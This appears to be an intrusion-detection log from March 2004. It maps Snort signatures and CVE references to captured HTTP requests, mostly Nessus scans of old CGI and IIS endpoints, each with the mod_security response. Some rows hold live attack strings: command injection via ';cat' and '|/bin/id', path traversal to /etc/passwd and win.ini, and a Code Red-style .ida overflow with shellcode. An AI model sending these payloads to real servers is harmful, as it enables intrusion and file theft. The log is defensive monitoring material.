1140 | arachNIDS 228 CVE-1999-0237 BID776 Nessus 10099 | attempted-recon | WEB-MISC guestbook.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:43:02 2004] "GET /cgi-bin/guestbook.pl HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/guestbook.pl ---------------------------------------- GET /cgi-bin/guestbook.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1147 | BID374 CVE-1999-0039 | attempted-recon | WEB-MISC cat%20 access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:03 2004] "GET /cgi-local/shop.pl/page=;cat%20shop.pl| HTTP/1.1" 404 316 Handler: (null) Error: File does not exist: /usr/local/apache/htdocs/cgi-local/shop.pl/page=;cat shop.pl| ---------------------------------------- GET /cgi-local/shop.pl/page=;cat%20shop.pl| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1148 | | attempted-recon | WEB-MISC Ecommerce import.txt access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:46 2004] "GET /webcart-lite/orders/import.txt HTTP/1.1" 403 314 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webcart-lite ---------------------------------------- GET /webcart-lite/orders/import.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=96 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1149 | Nessus 10049 CVE-1999-0021 BID128 | web-application-activity | WEB-CGI count.cgi access | Request: 217.226.156.144 - - [Fri Mar 12 08:37:03 2004] "GET http://www.webhits.de/cgi/Count.cgi?srgb=ff0000&sh=0&prgb=c60000&tr=1&trgb=000000&ft=0&dd=tinyred&df=14218.dat HTTP/1.0" 200 43 Handler: proxy-server Error: mod_security: Warning. Pattern match "/count\.cgi" at THE_REQUEST. ---------------------------------------- GET http://www.webhits.de/cgi/Count.cgi?srgb=ff0000&sh=0&prgb=c60000&tr=1&trgb=000000&ft=0&dd=tinyred&df=14218.dat HTTP/1.0 Accept: */* Accept-Language: de Cookie: WEBHCA14218:aaGorLZnc43GY=1100351657; SaneID=217.82.247.61-1078497488116 Host: www.webhits.de Proxy-Connection: close User-Agent: Anonymisiert durch Steganos Internet Anonym 6 mod_security-message: Warning. Pattern match "/count\.cgi" at THE_REQUEST. HTTP/1.0 200 OK Expires: Fri, 12 Mar 2004 14:37:04 GMT Last-Modified: Fri, 12 Mar 2004 13:37:04 GMT Content-Type: image/gif X-Cache: MISS from www.testproxy.net Connection: close |
1150 | | attempted-recon | WEB-MISC Domino catalog.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:15 2004] "GET /catalog.nsf HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/catalog.nsf ---------------------------------------- GET /catalog.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=93 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1151 | | attempted-recon | WEB-MISC Domino domcfg.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:18 2004] "GET /domcfg.nsf HTTP/1.1" 403 294 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/domcfg.nsf ---------------------------------------- GET /domcfg.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=80 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1152 | | attempted-recon | WEB-MISC Domino domlog.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:15 2004] "GET /domlog.nsf HTTP/1.1" 403 294 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/domlog.nsf ---------------------------------------- GET /domlog.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=91 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1153 | | attempted-recon | WEB-MISC Domino log.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:59 2004] "GET /log.nsf HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/log.nsf] for 50000 ms ---------------------------------------- GET /log.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/log\.nsf" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1154 | | attempted-recon | WEB-MISC Domino names.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:14 2004] "GET /names.nsf HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/names.nsf ---------------------------------------- GET /names.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1158 | Nessus 10365 arachNIDS 465 BID1073 CAN-2000-0242 | attempted-recon | WEB-MISC windmail.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:25 2004] "GET /cgi-bin/windmail.exe HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/windmail.exe ---------------------------------------- GET /cgi-bin/windmail.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1162 | BID1153 CAN-2000-0429 | attempted-recon | WEB-MISC cart 32 AdminPwd access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:46 2004] "GET /cgi-bin/c32web.exe/ChangeAdminPassword HTTP/1.1" 403 322 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/c32web.exe ---------------------------------------- GET /cgi-bin/c32web.exe/ChangeAdminPassword HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1163 | Nessus 10299 CVE-1999-0039 BID374 | web-application-activity | WEB-CGI webdist.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:44 2004] "GET /cgi-bin/webdist.cgi HTTP/1.1" 404 299 Handler: cgi-script Error: mod_security: Warning. Pattern match "/webdist\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/webdist.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/webdist\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1165 | CAN-1999-1006 BID879 | attempted-recon | WEB-MISC Novell Groupwise gwweb.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:53 2004] "GET /GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.1" 403 297 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/GW5 ---------------------------------------- GET /GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1167 | BID1036 CVE-2000-0192 | attempted-recon | WEB-MISC rpm_query access | Request: 217.160.165.173 - - [Fri Mar 12 22:44:34 2004] "GET /cgi-bin/rpm_query HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/rpm_query] for 50000 ms ---------------------------------------- GET /cgi-bin/rpm_query HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/rpm_query" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1172 | CVE-1999-1550 BID778 Nessus 10027 | web-application-activity | WEB-CGI bigconf.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:32:09 2004] "GET /bigipgui/bigconf.cgi?command=bigcommand&CommandType=bigpipe HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/bigipgui/bigconf.cgi] for 50000 ms ---------------------------------------- GET /bigipgui/bigconf.cgi?command=bigcommand&CommandType=bigpipe HTTP/1.0 Authorization: Basic c3VwcG9ydDpzdXBwb3J0 mod_security-message: Access denied with code 200. Pattern match "Basic" at HEADER. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1173 | | attempted-recon | WEB-MISC architext_query.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:43:57 2004] "GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/ews/ews/architext_query.pl] for 50000 ms ---------------------------------------- GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/ews/architext_query\.pl" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1174 | CVE-1999-0260 BID2002 | web-application-activity | WEB-CGI /cgi-bin/jj access | Request: 217.160.165.173 - - [Fri Mar 12 22:43:06 2004] "GET /cgi-bin/jj HTTP/1.1" 404 290 Handler: cgi-script Error: mod_security: Warning. Pattern match "/cgi-bin/jj" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/jj HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/cgi-bin/jj" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1180 | arachNIDS 258 BID1485 BID770 CAN-1999-0885 | attempted-recon | WEB-MISC get32.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:50 2004] "GET /cgi-bin/get32.exe HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/get32.exe ---------------------------------------- GET /cgi-bin/get32.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1194 | CAN-2000-0180 BID1052 | web-application-attack | WEB-CGI sojourn.cgi File attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:38:04 2004] "GET /cgi-bin/sojourn.cgi?cat=../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/sojourn.cgi?cat=../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1196 | CVE-2000-0207 arachNIDS 290 BID1031 | web-application-attack | WEB-CGI SGI InfoSearch fname attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:41:34 2004] "GET /infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/infosrch.cgi ---------------------------------------- GET /infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1206 | Nessus 10034 CVE-1999-0710 | web-application-activity | WEB-CGI cachemgr.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:52 2004] "GET /cgi-bin/cachemgr.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/cachemgr.cgi ---------------------------------------- GET /cgi-bin/cachemgr.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1208 | | web-application-activity | WEB-CGI responder.cgi access | Request: 24.127.175.68 - - [Sat Mar 13 15:35:36 2004] "GET http://www.bignipplelovers.com/members/index.html/cgi-bin/responder.cgi;dunno;RainM; HTTP/1.0" 401 3784 Handler: proxy-server Error: mod_security: Warning. Pattern match "/responder\.cgi" at THE_REQUEST. ---------------------------------------- GET http://www.bignipplelovers.com/members/index.html/cgi-bin/responder.cgi;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: www.bignipplelovers.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://www.bignipplelovers.com/members/index.html/cgi-bin/responder.cgi;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Warning. Pattern match "/responder\.cgi" at THE_REQUEST. HTTP/1.0 401 Authorization Required Warning: Subject to Monitoring WWW-Authenticate: Basic realm="Members" X-Powered-By: PHP/4.1.2 Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close |
1212 | | attempted-recon | WEB-MISC Admin_files access | Request: 217.160.165.173 - - [Fri Mar 12 22:31:15 2004] "GET /Admin_files/ HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/Admin_files/] for 50000 ms ---------------------------------------- GET /Admin_files/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/admin_files" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=85 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1213 | | attempted-recon | WEB-MISC backup access | Request: 217.160.165.173 - - [Fri Mar 12 22:31:19 2004] "GET /backups/ HTTP/1.1" 403 292 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/backups ---------------------------------------- GET /backups/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1214 | | attempted-recon | WEB-MISC intranet access | Request: 217.160.165.173 - - [Fri Mar 12 22:44:16 2004] "GET /intranet/browse.php HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/intranet/browse.php] for 50000 ms ---------------------------------------- GET /intranet/browse.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/intranet/" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1217 | BID2653 CAN-2000-0074 | attempted-recon | WEB-MISC plusmail access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:45 2004] "GET /cgi-bin/plusmail HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/plusmail] for 50000 ms ---------------------------------------- GET /cgi-bin/plusmail HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/plusmail" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1218 | | attempted-recon | WEB-MISC adminlogin access | Request: 24.127.175.68 - - [Sat Mar 13 23:45:47 2004] "GET http://www.catalinaxxx.com/members/mebershomepage/index.htm/session/adminlogin?RCpage=/sysadmin/index. HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://www.catalinaxxx.com/members/mebershomepage/index.htm/session/adminlogin?RCpage=/sysadmin/index.] for 50000 ms ---------------------------------------- GET http://www.catalinaxxx.com/members/mebershomepage/index.htm/session/adminlogin?RCpage=/sysadmin/index. HTTP/1.0 Cache-Control: no-cache Connection: close Host: www.catalinaxxx.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://www.catalinaxxx.com/members/mebershomepage/index.htm/session/adminlogin?RCpage=/sysadmin/index. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/adminlogin" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1220 | | attempted-recon | WEB-MISC ultraboard access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:21 2004] "GET /cgi-bin/UltraBoard.cgi HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/UltraBoard.cgi] for 50000 ms ---------------------------------------- GET /cgi-bin/UltraBoard.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/ultraboard" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1222 | Nessus 10611 BID2372 CAN-2001-0217 | web-application-attack | WEB-CGI pals-cgi arbitrary file access attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:38:56 2004] "GET /pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1" 403 292 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/pals-cgi ---------------------------------------- GET /pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1230 | Nessus 10733 CAN-2001-0432 BID2808 | attempted-recon | WEB-MISC VirusWall FtpSave access | Request: 217.160.165.173 - - [Fri Mar 12 22:32:10 2004] "GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/interscan/cgi-bin/FtpSave.dll] for 50000 ms ---------------------------------------- GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/FtpSave\.dll" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1242 | BID1065 CAN-2000-0071 arachNIDS 552 | web-application-activity | WEB-IIS ISAPI .ida access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:20 2004] "GET /anything.ida HTTP/1.1" 404 292 Handler: (null) Error: mod_security: Warning. Pattern match "\.ida" at THE_REQUEST. ---------------------------------------- GET /anything.ida HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.ida" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1243 | CAN-2000-0071 BID1065 arachNIDS 552 | web-application-attack | WEB-IIS ISAPI .ida attempt | Request: 68.48.205.207 - - [Wed Mar 10 19:14:37 2004] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 566 Handler: (null) Error: mod_security: Invalid URL encoding #2 detected. ---------------------------------------- GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-length: 3379 Content-type: text/xml mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1244 | BID1065 CAN-2000-0071 arachNIDS 553 | web-application-attack | WEB-IIS ISAPI .idq attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:39:06 2004] "GET /query.idq?CiTemplate=../../../../../winnt/win.ini HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/query.idq] for 50000 ms ---------------------------------------- GET /query.idq?CiTemplate=../../../../../winnt/win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "\.idq\?" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1245 | BID1065 CAN-2000-0071 arachNIDS 553 | web-application-activity | WEB-IIS ISAPI .idq access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:19 2004] "GET /anything.idq HTTP/1.1" 404 292 Handler: (null) Error: mod_security: Warning. Pattern match "\.idq" at THE_REQUEST. ---------------------------------------- GET /anything.idq HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.idq" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1248 | MS01-035 CAN-2001-0341 BID2906 arachNIDS 555 | web-application-activity | WEB-FRONTPAGE rad fp30reg.dll access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:49 2004] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 403 301 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/_vti_bin ---------------------------------------- POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1 Host: www.testproxy.net Transfer-Encoding: chunked [POST payload not available] HTTP/1.1 403 Forbidden Connection: close Content-Type: text/html; charset=iso-8859-1 |
